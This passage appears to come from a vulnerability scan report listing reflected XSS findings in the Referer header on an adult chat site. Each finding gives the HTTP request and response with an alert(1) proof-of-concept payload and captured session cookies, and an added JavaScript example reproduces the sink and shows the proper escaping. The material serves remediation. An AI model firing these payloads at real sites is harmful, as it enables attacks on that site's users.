Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:25 GMT
Connection: close
Content-Length: 25009
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.224. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/nude-chat/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/nude-chat/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:40 GMT
Connection: close
Content-Length: 23212
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

2.225. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/orgies/

Issue detail

The value of the Referer HTTP header is copied into the rf= parameter of the analytics tracking URL that an inline script assigns to the single-quoted JavaScript string imgSrc. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header and was echoed into that string without encoding: the application rewrites & to ^ in the Referer value but leaves the single quote untouched, so the quote closes the literal and the expression -alert(1)- is evaluated when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The surrounding try{...}catch(e){} only suppresses errors; it does not prevent the injected code from executing.

Because the injected data arrives in a request header, the flaw is harder to exploit against another user than a reflected query parameter: the attacker must cause the victim's browser to send a crafted Referer. Historically, client-side technologies such as Flash could set arbitrary request headers on cross-domain requests; the other route is a link from an attacker-controlled page whose own URL carries the payload, and whether that works depends on which of the characters ' ( ) the victim's browser leaves unencoded in the Referer it sends, which must be checked per browser. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the Referer must reach the analytics URL, encode it for the URL first (it is a query-string value) and then escape it for the JavaScript string literal it is written into, encoding every character outside a small alphanumeric allow-list as \xHH or \uXXXX. URL-encoding alone is not sufficient: encodeURIComponent-style encoding leaves ' ( ) and - unencoded, so the payload above survives it intact. Alternatively, place the value in an HTML attribute with attribute encoding and have the script read it from the DOM. Rewriting & to ^ is a delimiter change, not an encoding step, and provides no protection.

Request

GET /live-sex-chats/orgies/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:37 GMT
Connection: close
Content-Length: 49057
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty
...[SNIP]...

2.226. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/pornstars/

Issue detail

The value of the Referer HTTP header is copied into the rf= parameter of the analytics tracking URL that an inline script assigns to the single-quoted JavaScript string imgSrc. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header and was echoed into that string without encoding: the application rewrites & to ^ in the Referer value but leaves the single quote untouched, so the quote closes the literal and the expression -alert(1)- is evaluated when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The surrounding try{...}catch(e){} only suppresses errors; it does not prevent the injected code from executing.

Because the injected data arrives in a request header, the flaw is harder to exploit against another user than a reflected query parameter: the attacker must cause the victim's browser to send a crafted Referer. Historically, client-side technologies such as Flash could set arbitrary request headers on cross-domain requests; the other route is a link from an attacker-controlled page whose own URL carries the payload, and whether that works depends on which of the characters ' ( ) the victim's browser leaves unencoded in the Referer it sends, which must be checked per browser. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the Referer must reach the analytics URL, encode it for the URL first (it is a query-string value) and then escape it for the JavaScript string literal it is written into, encoding every character outside a small alphanumeric allow-list as \xHH or \uXXXX. URL-encoding alone is not sufficient: encodeURIComponent-style encoding leaves ' ( ) and - unencoded, so the payload above survives it intact. Alternatively, place the value in an HTML attribute with attribute encoding and have the script read it from the DOM. Rewriting & to ^ is a delimiter change, not an encoding step, and provides no protection.

Request

GET /live-sex-chats/pornstars/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:47 GMT
Connection: close
Content-Length: 265847
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if (
...[SNIP]...

2.227. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/role-play/

Issue detail

The value of the Referer HTTP header is copied into the rf= parameter of the analytics tracking URL that an inline script assigns to the single-quoted JavaScript string imgSrc. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header and was echoed into that string without encoding: the application rewrites & to ^ in the Referer value but leaves the single quote untouched, so the quote closes the literal and the expression -alert(1)- is evaluated when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The surrounding try{...}catch(e){} only suppresses errors; it does not prevent the injected code from executing.

Because the injected data arrives in a request header, the flaw is harder to exploit against another user than a reflected query parameter: the attacker must cause the victim's browser to send a crafted Referer. Historically, client-side technologies such as Flash could set arbitrary request headers on cross-domain requests; the other route is a link from an attacker-controlled page whose own URL carries the payload, and whether that works depends on which of the characters ' ( ) the victim's browser leaves unencoded in the Referer it sends, which must be checked per browser. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the Referer must reach the analytics URL, encode it for the URL first (it is a query-string value) and then escape it for the JavaScript string literal it is written into, encoding every character outside a small alphanumeric allow-list as \xHH or \uXXXX. URL-encoding alone is not sufficient: encodeURIComponent-style encoding leaves ' ( ) and - unencoded, so the payload above survives it intact. Alternatively, place the value in an HTML attribute with attribute encoding and have the script read it from the DOM. Rewriting & to ^ is a delimiter change, not an encoding step, and provides no protection.

Request

GET /live-sex-chats/role-play/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:56 GMT
Connection: close
Content-Length: 53309
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if
...[SNIP]...
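
Findings 2.225 to 2.227 above (and 2.228, which follows) share one sink: the Referer value lands in a single-quoted JavaScript string inside an inline script, with & rewritten to ^ and nothing else encoded. The block below is an added example, not code from the CloudScan report or from imlive.com. It reproduces that sink with the marker from finding 2.225, shows that URL-encoding the value on its own does not close the hole, and applies the JavaScript-string escaping the remediation calls for. The functions wrapInTrackingScript, jsStringEscape, probe and summary, and the shortened tracking URL (only the rf= parameter is kept), are this example's own constructions; probe evaluates the generated script with alert() replaced by a spy, which is a local canary check and not the scanner's method.

```javascript
// Added example: reproduces the Referer -> JS string sink from findings
// 2.225-2.228 and compares three ways of building the tracking script.
// Nothing here is imlive.com's code; the URL is shortened to the rf= parameter.

// Marker from finding 2.225 and the Referer the scanner sent with it.
const PAYLOAD = "e2f14'-alert(1)-'1a0426053d6";
const REFERER = "http://www.google.com/search?hl=en&q=" + PAYLOAD;

// Shape of the inline script seen in the responses (hypothetical reduction:
// the other analytics parameters are dropped, only rf= varies).
function wrapInTrackingScript(rfValue) {
  return "try{var imgSrc='http://analytic.imlive.com/w.gif?rf=" + rfValue + "';}catch(e){};";
}

// 1. As observed: '&' becomes '^' (a delimiter change for the analytics
//    back end); the quote is untouched and closes the string literal.
function buildVulnerable(referer) {
  return wrapInTrackingScript(referer.replace(/&/g, "^"));
}

// 2. A common but insufficient fix: URL-encode the value. encodeURIComponent
//    leaves ' ( ) - _ . ! ~ * untouched, so the marker still breaks out.
function buildUrlEncodedOnly(referer) {
  return wrapInTrackingScript(encodeURIComponent(referer));
}

// 3. Hardened: encode for the URL first (it is a query-string value), then
//    escape for the JavaScript string literal it is written into. Every
//    character outside a small allow-list becomes \xHH or \uXXXX, which also
//    neutralises "</script>" and the U+2028/U+2029 line terminators.
function jsStringEscape(s) {
  return String(s).replace(/[^A-Za-z0-9._~:\/?=%-]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 0x100
      ? "\\x" + code.toString(16).padStart(2, "0")
      : "\\u" + code.toString(16).padStart(4, "0");
  });
}
function buildHardened(referer) {
  return wrapInTrackingScript(jsStringEscape(encodeURIComponent(referer)));
}

// Canary check: evaluate the generated script with alert() bound to a spy.
// A real break-out calls the spy and leaves imgSrc as NaN (string minus
// number); a correctly encoded value never calls alert and imgSrc is the
// intended URL. This is a local test harness, not something to ship.
function probe(scriptSource) {
  const alertCalls = [];
  const run = new Function("alert", scriptSource + "\nreturn imgSrc;");
  const imgSrc = run((x) => { alertCalls.push(x); return 0; });
  return { alertCalls, imgSrc };
}

// What the tracking URL should have contained for this Referer.
const EXPECTED_URL = "http://analytic.imlive.com/w.gif?rf=" + encodeURIComponent(REFERER);

function summary() {
  return {
    vulnerable: probe(buildVulnerable(REFERER)),
    urlEncodedOnly: probe(buildUrlEncodedOnly(REFERER)),
    hardened: probe(buildHardened(REFERER)),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  for (const [name, r] of Object.entries(summary())) {
    console.log(name.padEnd(15), r.alertCalls.length ? "alert() fired" : "no alert   ", "imgSrc =", r.imgSrc);
  }
}
```

Run it with node: the observed construction and the URL-encoded-only variant both fire alert(), while the hardened variant yields exactly the intended URL. The allow-list in jsStringEscape is deliberately small; it is easier to reason about which characters pass through than to enumerate which ones are dangerous in a given script context.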

2.228. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/sex-show-galleries/

Issue detail

The value of the Referer HTTP header is copied into the rf= parameter of the analytics tracking URL that an inline script assigns to the single-quoted JavaScript string imgSrc. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header and was echoed into that string without encoding: the application rewrites & to ^ in the Referer value but leaves the single quote untouched, so the quote closes the literal and the expression -alert(1)- is evaluated when the script runs.

This proof-of-concept demonstrates that arbitrary JavaScript can be injected into the application's response. The surrounding try{...}catch(e){} only suppresses errors; it does not prevent the injected code from executing.

Because the injected data arrives in a request header, the flaw is harder to exploit against another user than a reflected query parameter: the attacker must cause the victim's browser to send a crafted Referer. Historically, client-side technologies such as Flash could set arbitrary request headers on cross-domain requests; the other route is a link from an attacker-controlled page whose own URL carries the payload, and whether that works depends on which of the characters ' ( ) the victim's browser leaves unencoded in the Referer it sends, which must be checked per browser. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. Where the Referer must reach the analytics URL, encode it for the URL first (it is a query-string value) and then escape it for the JavaScript string literal it is written into, encoding every character outside a small alphanumeric allow-list as \xHH or \uXXXX. URL-encoding alone is not sufficient: encodeURIComponent-style encoding leaves ' ( ) and - unencoded, so the payload above survives it intact. Alternatively, place the value in an HTML attribute with attribute encoding and have the script read it from the DOM. Rewriting & to ^ is a delimiter change, not an encoding step, and provides no protection.

Request

GET /live-sex-chats/sex-show-galleries/ HTTP/1.1
Ho